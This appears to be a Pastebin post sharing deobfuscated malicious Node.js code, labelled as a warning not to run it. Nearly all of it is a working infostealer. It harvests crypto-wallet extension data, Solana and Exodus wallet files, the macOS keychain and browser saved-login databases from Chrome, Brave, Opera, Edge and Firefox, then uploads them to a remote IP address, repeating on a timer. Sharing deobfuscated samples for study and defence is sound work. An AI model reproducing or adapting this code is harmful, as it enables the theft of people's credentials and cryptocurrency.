API tools faq
paste
Advertisement
Guest User

Deobfuscated Code

a guest
Nov 25th, 2024
1,645
1
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.93 KB | Cybersecurity | 1 0
raw download clone embed print report
  1. Deobfuscated Malicious Code - Absolutely do not run
  2.  
  3. const fs = require('fs');
  4. const os = require('os');
  5. const path = require('path');
  6. const request = require('request');
  7. const { exec } = require('child_process');
  8.  
  9. // System information
  10. const hostname = os.hostname();
  11. const platform = os.platform();
  12. const homeDir = os.homedir();
  13. const tempDir = os.tmpdir();
  14. const serverUrl =// http://45.128.52.14:1224
  15.  
  16. // Helper function to resolve paths, handling '~' for home directory
  17. const resolvePath = (p) => p.replace(/^~([a-z]+|\/)/, (match, p1) =>
  18. p1 === '/' ? homeDir : path.dirname(homeDir) + '/' + p1
  19. );
  20.  
  21. // Function to check if a file or directory exists
  22. function fileExists(filePath) {
  23. try {
  24. fs.accessSync(filePath);
  25. return true;
  26. } catch (err) {
  27. return false;
  28. }
  29. }
  30.  
  31. // Browser paths for different platforms
  32. const bravePaths = [
  33. 'Local/BraveSoftware/Brave-Browser', // Windows
  34. 'BraveSoftware/Brave-Browser', // macOS
  35. 'BraveSoftware/Brave-Browser' // Linux
  36. ];
  37. const chromePaths = [
  38. 'Local/Google/Chrome', // Windows
  39. 'Google/Chrome', // macOS
  40. 'google-chrome' // Linux
  41. ];
  42. const operaPaths = [
  43. 'Roaming/Opera Software/Opera Stable', // Windows
  44. 'com.operasoftware.Opera', // macOS
  45. 'opera' // Linux
  46. ];
  47.  
  48. // Extension IDs for cryptocurrency wallets (e.g., MetaMask)
  49. const extensionIds = [
  50. 'nkbihfbeogaeaoehlefnkodbefgpgknn', // MetaMask
  51. // ... (other extension IDs)
  52. ];
  53.  
  54. // Function to search for extension data in browser profiles
  55. const findExtensionData = async (browserBasePath, prefix, includeSolana, timestamp) => {
  56. let collectedFiles = [];
  57. if (!browserBasePath || browserBasePath === '') {
  58. return [];
  59. }
  60.  
  61. try {
  62. if (!fileExists(browserBasePath)) {
  63. return [];
  64. }
  65. } catch (err) {
  66. return [];
  67. }
  68.  
  69. for (let profileIndex = 0; profileIndex < 200; profileIndex++) {
  70. const profilePath = path.join(
  71. browserBasePath,
  72. profileIndex === 0 ? 'Default' : `Profile ${profileIndex}`,
  73. 'Local Extension Settings'
  74. );
  75.  
  76. for (const extId of extensionIds) {
  77. const extPath = path.join(profilePath, extId);
  78. if (fileExists(extPath)) {
  79. let files;
  80. try {
  81. files = fs.readdirSync(extPath);
  82. } catch (err) {
  83. files = [];
  84. }
  85.  
  86. for (const file of files) {
  87. const filePath = path.join(extPath, file);
  88. try {
  89. const stats = fs.statSync(filePath);
  90. if (stats.isDirectory()) {
  91. continue;
  92. }
  93. const fileOptions = {
  94. filename: `${timestamp}_${prefix}${profileIndex}_${extId}_${file}`
  95. };
  96. collectedFiles.push({
  97. value: fs.createReadStream(filePath),
  98. options: fileOptions
  99. });
  100. } catch (err) {
  101. // Ignore errors
  102. }
  103. }
  104. }
  105. }
  106. }
  107.  
  108. // Collect Solana key file if includeSolana is true
  109. if (includeSolana) {
  110. const solanaKeyPath = path.join(homeDir, '.config', 'solana', 'id.json');
  111. if (fs.existsSync(solanaKeyPath)) {
  112. try {
  113. const fileOptions = { filename: 'solana_id.txt' };
  114. collectedFiles.push({
  115. value: fs.createReadStream(solanaKeyPath),
  116. options: fileOptions
  117. });
  118. } catch (err) {
  119. // Ignore errors
  120. }
  121. }
  122. }
  123.  
  124. uploadFiles(collectedFiles, timestamp);
  125. return collectedFiles;
  126. };
  127.  
  128. // Function to upload collected files to the remote server
  129. const uploadFiles = (files, timestamp) => {
  130. const formData = {
  131. type: '39',
  132. hid: `391_${hostname}`,
  133. uts: timestamp,
  134. multi_file: files
  135. };
  136.  
  137. try {
  138. if (files.length > 0) {
  139. const options = {
  140. url: `${serverUrl}/uploads`,
  141. formData: formData
  142. };
  143. request.post(options, (err, response, body) => {
  144. // Handle response if necessary
  145. });
  146. }
  147. } catch (err) {
  148. // Handle errors
  149. }
  150. };
  151.  
  152. // Function to collect Firefox extension data
  153. const collectFirefoxData = (timestamp) => {
  154. const profilesPath = resolvePath('~/') + '/AppData/Roaming/Mozilla/Firefox/Profiles';
  155. let collectedFiles = [];
  156.  
  157. if (fileExists(profilesPath)) {
  158. let profileDirs = [];
  159. try {
  160. profileDirs = fs.readdirSync(profilesPath);
  161. } catch (err) {
  162. profileDirs = [];
  163. }
  164.  
  165. let profileCounter = 0;
  166. for (const profileDir of profileDirs) {
  167. const profilePath = path.join(profilesPath, profileDir);
  168. if (profilePath.includes('-release')) {
  169. const storagePath = path.join(profilePath, 'storage', 'default');
  170. let storageDirs = [];
  171. try {
  172. storageDirs = fs.readdirSync(storagePath);
  173. } catch (err) {
  174. storageDirs = [];
  175. }
  176.  
  177. let extensionCounter = 0;
  178. for (const storageDir of storageDirs) {
  179. if (storageDir.includes('moz-extension')) {
  180. let idbPath = path.join(storagePath, storageDir, 'idb');
  181. let idbFiles = [];
  182. try {
  183. idbFiles = fs.readdirSync(idbPath);
  184. } catch (err) {
  185. idbFiles = [];
  186. }
  187.  
  188. for (const idbFile of idbFiles) {
  189. if (idbFile.includes('.files')) {
  190. const filesPath = path.join(idbPath, idbFile);
  191. let files = [];
  192. try {
  193. files = fs.readdirSync(filesPath);
  194. } catch (err) {
  195. files = [];
  196. }
  197.  
  198. for (const file of files) {
  199. const filePath = path.join(filesPath, file);
  200. if (!fs.statSync(filePath).isDirectory()) {
  201. const fileOptions = {
  202. filename: `${profileCounter}_${extensionCounter}_${file}`
  203. };
  204. collectedFiles.push({
  205. value: fs.createReadStream(filePath),
  206. options: fileOptions
  207. });
  208. }
  209. }
  210. }
  211. }
  212. }
  213. extensionCounter += 1;
  214. }
  215. }
  216. profileCounter += 1;
  217. }
  218. uploadFiles(collectedFiles, timestamp);
  219. return collectedFiles;
  220. }
  221. };
  222.  
  223. // Function to collect Exodus wallet data
  224. const collectExodusData = (timestamp) => {
  225. let exodusPath = '';
  226.  
  227. if (platform.startsWith('w')) {
  228. exodusPath = resolvePath('~/') + '/AppData/Roaming/Exodus/exodus.wallet';
  229. } else if (platform.startsWith('d')) {
  230. exodusPath = resolvePath('~/') + '/Library/Application Support/exodus.wallet';
  231. } else {
  232. exodusPath = resolvePath('~/') + '/.config/Exodus/exodus.wallet';
  233. }
  234.  
  235. let collectedFiles = [];
  236. if (fileExists(exodusPath)) {
  237. let walletFiles = [];
  238. try {
  239. walletFiles = fs.readdirSync(exodusPath);
  240. } catch (err) {
  241. walletFiles = [];
  242. }
  243.  
  244. for (const file of walletFiles) {
  245. const filePath = path.join(exodusPath, file);
  246. try {
  247. const fileOptions = { filename: `391_${file}` };
  248. collectedFiles.push({
  249. value: fs.createReadStream(filePath),
  250. options: fileOptions
  251. });
  252. } catch (err) {
  253. // Ignore errors
  254. }
  255. }
  256. }
  257. uploadFiles(collectedFiles, timestamp);
  258. return collectedFiles;
  259. };
  260.  
  261. // Function to collect Keychain data on macOS
  262. const collectMacKeychainData = (timestamp) => {
  263. let collectedFiles = [];
  264. let keychainPath = path.join(homeDir, 'Library', 'Keychains', 'login.keychain');
  265.  
  266. if (fs.existsSync(keychainPath)) {
  267. try {
  268. const fileOptions = { filename: 'logkc-db' };
  269. collectedFiles.push({
  270. value: fs.createReadStream(keychainPath),
  271. options: fileOptions
  272. });
  273. } catch (err) {
  274. // Ignore errors
  275. }
  276. } else {
  277. keychainPath += '-db';
  278. if (fs.existsSync(keychainPath)) {
  279. try {
  280. const fileOptions = { filename: 'logkc-db' };
  281. collectedFiles.push({
  282. value: fs.createReadStream(keychainPath),
  283. options: fileOptions
  284. });
  285. } catch (err) {
  286. // Ignore errors
  287. }
  288. }
  289. }
  290.  
  291. // Collecting Chrome Login Data
  292. try {
  293. const chromeBasePath = path.join(homeDir, 'Library', 'Application Support', 'Google', 'Chrome');
  294. if (fileExists(chromeBasePath)) {
  295. for (let profileIndex = 0; profileIndex < 200; profileIndex++) {
  296. const profilePath = path.join(
  297. chromeBasePath,
  298. profileIndex === 0 ? 'Default' : `Profile ${profileIndex}`,
  299. 'Login Data'
  300. );
  301. try {
  302. if (!fileExists(profilePath)) {
  303. continue;
  304. }
  305. const tempFilePath = path.join(chromeBasePath, `ld_${profileIndex}`);
  306. const fileOptions = { filename: `pld_${profileIndex}` };
  307. if (fileExists(tempFilePath)) {
  308. collectedFiles.push({
  309. value: fs.createReadStream(tempFilePath),
  310. options: fileOptions
  311. });
  312. } else {
  313. fs.copyFile(profilePath, tempFilePath, (err) => {
  314. if (!err) {
  315. const filesToUpload = [{
  316. value: fs.createReadStream(profilePath),
  317. options: { filename: `pld_${profileIndex}` }
  318. }];
  319. uploadFiles(filesToUpload, timestamp);
  320. }
  321. });
  322. }
  323. } catch (err) {
  324. // Ignore errors
  325. }
  326. }
  327. }
  328. } catch (err) {
  329. // Ignore errors
  330. }
  331.  
  332. // Collecting Brave Login Data
  333. try {
  334. const braveBasePath = path.join(homeDir, 'Library', 'Application Support', 'BraveSoftware', 'Brave-Browser');
  335. if (fileExists(braveBasePath)) {
  336. for (let profileIndex = 0; profileIndex < 200; profileIndex++) {
  337. const profilePath = path.join(
  338. braveBasePath,
  339. profileIndex === 0 ? 'Default' : `Profile ${profileIndex}`
  340. );
  341. try {
  342. if (!fileExists(profilePath)) {
  343. continue;
  344. }
  345. const loginDataPath = path.join(profilePath, 'Login Data');
  346. const fileOptions = { filename: `brld_${profileIndex}` };
  347. if (fileExists(loginDataPath)) {
  348. collectedFiles.push({
  349. value: fs.createReadStream(loginDataPath),
  350. options: fileOptions
  351. });
  352. } else {
  353. fs.copyFile(profilePath, loginDataPath, (err) => {
  354. if (!err) {
  355. const filesToUpload = [{
  356. value: fs.createReadStream(profilePath),
  357. options: { filename: `brld_${profileIndex}` }
  358. }];
  359. uploadFiles(filesToUpload, timestamp);
  360. }
  361. });
  362. }
  363. } catch (err) {
  364. // Ignore errors
  365. }
  366. }
  367. }
  368. } catch (err) {
  369. // Ignore errors
  370. }
  371.  
  372. uploadFiles(collectedFiles, timestamp);
  373. return collectedFiles;
  374. };
  375.  
  376. // Function to collect browser login data
  377. const collectLoginData = async (browserPaths, prefix, timestamp) => {
  378. let collectedFiles = [];
  379. let basePath = '';
  380.  
  381. if (platform.startsWith('d')) {
  382. // macOS
  383. basePath = path.join(homeDir, 'Library', 'Application Support', browserPaths[1]);
  384. } else if (platform.startsWith('l')) {
  385. // Linux
  386. basePath = path.join(homeDir, '.config', browserPaths[2]);
  387. } else {
  388. // Windows
  389. basePath = path.join(homeDir, 'AppData', browserPaths[0], 'User Data');
  390. }
  391.  
  392. const localStatePath = path.join(basePath, 'Local State');
  393. if (fs.existsSync(localStatePath)) {
  394. try {
  395. const fileOptions = { filename: `${prefix}_lst` };
  396. collectedFiles.push({
  397. value: fs.createReadStream(localStatePath),
  398. options: fileOptions
  399. });
  400. } catch (err) {
  401. // Ignore errors
  402. }
  403. }
  404.  
  405. try {
  406. if (fileExists(basePath)) {
  407. for (let profileIndex = 0; profileIndex < 200; profileIndex++) {
  408. const profilePath = path.join(
  409. basePath,
  410. profileIndex === 0 ? 'Default' : `Profile ${profileIndex}`,
  411. 'Login Data'
  412. );
  413. try {
  414. if (!fileExists(profilePath)) {
  415. continue;
  416. }
  417. const fileOptions = { filename: `${prefix}_${profileIndex}_uld` };
  418. collectedFiles.push({
  419. value: fs.createReadStream(profilePath),
  420. options: fileOptions
  421. });
  422. } catch (err) {
  423. // Ignore errors
  424. }
  425. }
  426. }
  427. } catch (err) {
  428. // Ignore errors
  429. }
  430.  
  431. uploadFiles(collectedFiles, timestamp);
  432. return collectedFiles;
  433. };
  434.  
  435. // Main function to start data collection
  436. const startDataCollection = async () => {
  437. try {
  438. const timestamp = Math.round(Date.now() / 1000);
  439. await findExtensionData(chromePaths[0], '0_', false, timestamp);
  440. await findExtensionData(bravePaths[0], '1_', false, timestamp);
  441. await findExtensionData(operaPaths[0], '2_', false, timestamp);
  442. collectExodusData(timestamp);
  443.  
  444. if (platform.startsWith('w')) {
  445. await findExtensionData(
  446. path.join(homeDir, 'AppData', 'Local', 'Microsoft', 'Edge', 'User Data'),
  447. '3_',
  448. false,
  449. timestamp
  450. );
  451. }
  452.  
  453. if (platform.startsWith('d')) {
  454. collectMacKeychainData(timestamp);
  455. } else {
  456. await collectLoginData(chromePaths, '0', timestamp);
  457. await collectLoginData(bravePaths, '1', timestamp);
  458. await collectLoginData(operaPaths, '2', timestamp);
  459. }
  460. } catch (err) {
  461. // Handle errors
  462. }
  463. };
  464.  
  465. startDataCollection();
  466.  
  467. // Schedule data collection to repeat after a certain interval
  468. let intervalCounter = 0;
  469. const maxIntervals = 2;
  470. const dataCollectionInterval = setInterval(() => {
  471. intervalCounter += 1;
  472. if (intervalCounter < maxIntervals) {
  473. startDataCollection();
  474. } else {
  475. clearInterval(dataCollectionInterval);
  476. }
  477. }, 300000); // 5 minutes in milliseconds
  478.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!